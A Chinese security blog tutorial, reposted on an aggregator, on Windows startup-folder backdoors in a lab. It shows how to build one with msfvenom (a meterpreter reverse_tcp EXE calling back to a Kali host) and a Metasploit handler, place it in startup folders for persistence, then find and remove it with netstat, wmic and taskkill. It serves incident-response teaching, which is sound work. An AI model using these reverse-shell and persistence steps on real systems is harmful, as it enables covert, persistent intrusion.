[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-5:启动项后门

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

  • 🍬 博主介绍
      • 1.5.1 启动项后门介绍
        • 1.5.1.1 简介
        • 1.5.1.2 原理
        • 1.5.1.3 实现步骤
        • 1.5.1.4 防御措施
        • 1.5.1.5 应用场景
      • 1.5.2 启动项后门创建实战
        • 1.5.2.1 启动项后门演示
          • 1.5.2.1.1 前提条件
          • 1.5.2.1.2 环境介绍
          • 1.5.2.1.3 利用MSF生成一个EXE类型的后门木马
          • 1.5.2.1.4 MSF 启动监听
          • 1.5.2.1.5 将后门放在 Windows启动项
          • 1.5.2.1.6 重启 windows
          • 1.5.2.1.7 windows10权限丢失
      • 1.5.3 启动项后门后门应急实战
        • 1.5.3.1 查看网络连接
        • 1.5.3.2 分析找到源头
        • 1.5.3.3 应急处置
        • 1.5.3.4 注意事项

1.5.1 启动项后门介绍

1.5.1.1 简介

Windows启动项后门是指攻击者通过修改系统设置,使得在每次计算机启动时自动执行特定的恶意程序或脚本,从而实现对目标系统的持续控制。这种后门通常用于在攻击者获得初始访问权限后,确保他们可以长期保持对系统的控制权,即使系统重启也不会丢失访问权限。

1.5.1.2 原理

Windows启动项后门的原理基于操作系统的启动过程。在Windows系统中,有一些特定的文件夹和注册表项会在系统启动时被自动加载和执行。攻击者可以通过在这些位置添加恶意程序或脚本,使它们在系统启动时自动运行。

1.5.1.3 实现步骤

生成后门程序:使用工具如Metasploit生成一个EXE类型的后门木马。
放置后门文件:将生成的后门文件放置在系统启动文件夹中,例如C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp或用户级的启动文件夹C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。
隐藏后门文件:为了提高隐蔽性,可以使用文件隐藏技巧对后门文件进行隐藏处理。
添加自启动服务:将后门程序注册为服务,并设置为自动启动,这样即使在没有用户登录的情况下,后门程序也会运行。
利用组策略:通过组策略添加启动脚本,利用组策略的自启动策略来加载后门文件。
注册表自启动:修改注册表中的自启动键值,添加后门程序的路径,使其在系统启动时自动运行。

1.5.1.4 防御措施

定期检查启动项:定期检查系统的启动文件夹和注册表中的自启动项,删除不明或可疑的程序。 使用安全软件:安装可靠的杀毒软件和防火墙,定期更新病毒库和系统补丁,以减少恶意软件感染的风险。 限制权限:对于敏感操作,如修改注册表和启动文件夹,应限制只有管理员权限的用户才能执行。 监控网络连接:使用命令如netstat -ano`查看异常网络连接,通过PID号查找并终止可疑进程。
文件完整性监控:使用文件完整性监控工具,监控关键系统文件的变化,及时发现并响应潜在的威胁。

1.5.1.5 应用场景

权限维持:在成功入侵目标系统后,攻击者通常会植入后门程序,以便在系统重启后仍然能够保持访问权限。
远程控制:通过后门程序,攻击者可以在不被察觉的情况下远程控制目标系统,执行各种恶意操作。
数据窃取:后门程序可以用于定期收集并发送目标系统的敏感数据,如密码、个人信息等。
持久化攻击:通过不断更新和隐藏后门程序,攻击者可以实现对目标系统的长期控制,难以被发现和清除。

1.5.2 启动项后门创建实战

1.5.2.1 启动项后门演示
1.5.2.1.1 前提条件

假设在攻击的过程中,我们通过利用各种getshell手段,不仅成功渗透进了目标服务器的防御体系,还进一步拿到了具有最高控制权限的administrator权限,这意味着我们已经能够完全掌控这台服务器,可以执行任何我们需要的操作。这时候我们需要进行权限维持,从而创建各种后门,包括我们这里讲到的启动项后门。

1.5.2.1.2 环境介绍

靶机: windows 10
IP: 10.0.0.158
攻击机: kali
IP: 10.0.0.128

1.5.2.1.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe 

在这里插入图片描述

1.5.2.1.4 MSF 启动监听

在kali上监听端口55555,重启windows10之后马上就接收到目标机弹回来的shell

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run

在这里插入图片描述

1.5.2.1.5 将后门放在 Windows启动项

「开始」菜单 是Windows计算机在启动时都会访问到的路径,那么将PowerShell.exe后门文件放在启动项中,那么服务器每次重启都会运行该后门,从而达到权限维持的目的
「开始」菜单启动项指示了启动文件夹的位置,具体位置如下,放那个位置都行,最好都放:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup

在这里插入图片描述

1.5.2.1.6 重启 windows

目标机每次重启都会启动PowerShell.exe后门程序。

在这里插入图片描述

1.5.2.1.7 windows10权限丢失

shell成功反弹

在这里插入图片描述

1.5.3 启动项后门后门应急实战

1.5.3.1 查看网络连接

使用命令netstat -ano是可以查看到异常连接,重点查看ESTABLISHED连接。

netstat -ano
1.5.3.2 分析找到源头

通过PID号查找该进程文件所在的位置

wmic process get name,executablepath,processid|findstr 7456

在这里插入图片描述

发现异常程序所在位置:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\wxiaoge.exe PowerShell.exe
1.5.3.3 应急处置

删除发现的恶意文件PowerShell.exe

c:\programdata\microsoft\windows\start menu\programs\startup\PowerShell.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\PowerShell.exe

并通过PID号强制杀掉进程的命令

taskkill /f /pid 2920
1.5.3.4 注意事项

如果黑客与win10机器没有处于连接状态,我们可以通过其他的一些分析手段进行分析,如使用Autoruns等启动项工具进行分析,也可以手工进行分析。
Autoruns 参考文章及工具获取:

https://blog.csdn.net/qq_51577576/article/details/130119164

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/20307.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

编译报错:protoc did not exit cleanly. Review output for more information.

目录标题 解决“protoc did not exit cleanly”的报错问题检查.proto文件的语法 解决“protoc did not exit cleanly”的报错问题 今天做的项目需要用到grpc,然后需要编写proto然后编译后实现grpc的具体方法! 结果编译的时候报了protoc did not exit cl…

Java码农人生开启手册——重载和重写

一、重载 有时在调用现有方法时会出现参数类型不匹配的问题,在Java中,如果多个方法的名字相同,参数列表不同,则称该几种方法被重载了。 注意: 方法名必须相同参数列表必须不同与返回值是否相同无关编译器在编译代码时&…

ComfyUI-unclip模型部署指南

一、介绍 unCLIP 模型是 SD 模型的版本,经过专门调整,除了文本提示之外,还可以接收图像概念作为输入。使用这些模型附带的 CLIPVision 对图像进行编码,然后在采样时将其提取的概念传递给主模型。 它并不是按照传统意义将图像混合…

优雅关闭:避免服务停机带来的业务损失

服务关闭有什么问题? 在“单体应用”复杂到一定程度后,一般会进行系统拆分,也就是微服务架构。服务拆分之后,就需要协同,于是RPC框架就出来了,用来解决各个子系统之间的通信问题。 拆分系统的目的&#x…

硬件知识 cadence16.6 原理图输出为pdf 网络名下划线偏移 (ORCAD)

1. cadence原理图输出为PDF网络名下划线偏移 生这种情况的原因 1. 设计的原理图图纸大小比正常的 A4图纸大。 2. 打印为PDF 的时候,打印机的设置有问题。 2.cadence原理图输出为 PDF网络名下划线偏移的情况 可以看到上图,网络名往上漂移。 3. 解决办法 …

Linux插件zsh(oh-my-zsh)

一、oh-my-zsh基本介绍 oh-my-zsh: https://github.com/ohmyzsh/ohmyzshhttps://github.com/ohmyzsh/ohmyzsh 注意:需要先安装zsh命令,才能安装oh-my-zsh,先测试是否安装了zsh rootserver:/opt # zsh --version zsh 5.8 (x86_6…

异或和之和

//暴力做法 枚举每个子区间 O(n^3) //优化1 利用前缀异或和快速求出区间异或和 O(n^2) //优化2 处理位运算的常用方法:拆位法 常用的思想:贡献法思想 下面详见优化2: 1.拆位贡献法 2.实战真题1 题目链接:1.异或和之和 - 蓝桥…

A039-基于SpringBoot的农产品销售系统的设计与实现

🙊作者简介:在校研究生,拥有计算机专业的研究生开发团队,分享技术代码帮助学生学习,独立完成自己的网站项目。 代码可以查看文章末尾⬇️联系方式获取,记得注明来意哦~🌹 赠送计算机毕业设计600…

【大数据学习 | Spark】RDD的概念与Spark任务的执行流程

1. RDD的设计背景 在实际应用中,存在许多迭代式计算,这些应用场景的共同之处是,不同计算阶段之间会重用中间结果,即一个阶段的输出结果会作为下一个阶段的输入。但是,目前的MapReduce框架都是把中间结果写入到HDFS中&…

jmeter操作数据库

简介 Apache JMeter 是一个强大的开源工具,用于负载测试和性能测量。除了Web应用外,JMeter还可以用于测试各种数据库系统,包括MySQL。本文将详细介绍如何使用JMeter来测试MySQL数据库的性能。 环境准备 安装Java:确保你已经安装…

最小生成树——Kruskal、Prim算法

图的存储: 高阶数据结构——图 文章目录 目录 文章目录 一、kruskal算法 二、Prim算法 前言 连通图中的每一棵生成树,都是原图的一个极大无环子图,即:从其中删去任何一条边,生成树 就不在连通;反之&#xf…

STL-stack栈:P1981 [NOIP2013 普及组] 表达式求值

这个题用的STL-栈来做 题目来源:洛谷 相关知识 [NOIP2013 普及组] 表达式求值 题目背景 NOIP2013 普及组 T2 题目描述 给定一个只包含加法和乘法的算术表达式,请你编程计算表达式的值。 输入格式 一行,为需要你计算的表达式&#xff…

数字孪生赋能智慧校园:构建全方位校园安全保障新体系

在11月19日最高人民检察院的党组会上,校园安全问题再次被置于重要议程,会议明确指出,校园安全不仅关乎学生的健康成长,更与社会和谐稳定紧密相连。面对侵害学生权益、危害校园安全的犯罪行为,必须采取“零容忍”态度&a…

Openstack15--块存储服务(Cinder)安装

控制节点 安装Cinder软件包 yum -y install openstack-cinder 安装的“openstack-cinder”软件包里包括“cinder-api”和“cinder-scheduler”模块。安装“openstack-cinder”软件包时,和安装其他OpenStack核心组件时一样,会自动创建名为“cinder”的L…

如何用js方法把页面中的表格导出为excel表格(sheetJS)

目录 一,SheetJS库的基本介绍 这里用到的库是SheetJS,官方文档: sheetJS CE 官方文档 官网对库的解释是: SheetJS社区版提供了经过战斗测试的开源解决方案,用于从几乎任何复杂的电子表格中提取有用的数据&#xf…

自动驾驶系列—告别眩光烦恼:智能大灯如何守护夜间行车安全

🌟🌟 欢迎来到我的技术小筑,一个专为技术探索者打造的交流空间。在这里,我们不仅分享代码的智慧,还探讨技术的深度与广度。无论您是资深开发者还是技术新手,这里都有一片属于您的天空。让我们在知识的海洋中…

爬虫策略——反爬机制

现代网站通常会使用多种反爬手段来限制爬虫访问数据。了解这些机制并针对性地制定绕过策略,是构建高效爬虫的关键。 1. 常见反爬手段 1.1 User-Agent 检查 网站通常会通过检查请求中的 User-Agent 字段,判断访问是否来自真实用户。爬虫默认的请求库&am…

DataWhale—PumpkinBook(TASK03对数几率回归)

一、课程组成及结构 课程开源地址及相关视频链接:(当然这里也希望大家支持一下正版西瓜书和南瓜书图书,支持文睿、秦州等等致力于开源生态建设的大佬✿✿ヽ(▽)ノ✿) Datawhale-学用 AI,从此开始 【吃瓜教程】《机器学习公式详解…

系统安全第十三次作业题目及答案

一、 1.计划 实施 检查 处置 2.物理 系统 运行 数据 人员 技术文档 3.物理 网络 系统 应用 管理 二、 1.C 2.B 3.A 4.ACDE 5.ABCD 三、 1. 答: 概念:信息系统安全管理指通过计划、组织、领导、控制等环节来协调人力、物力、财力等资源&#x…

Qml 模型-视图-代理(贰)之 代理(Delegate) 学习

使用模型与视图来定义用户界面时,代理在创建显示时扮演了大量的角色,在模型中的每个元素通过代理来实现可视化。 代理 使用键盘移动 高亮 效果 代码: 视图绑定的属性是 ListView.isCurrentItem: 这个属性是一个布尔值,标识这…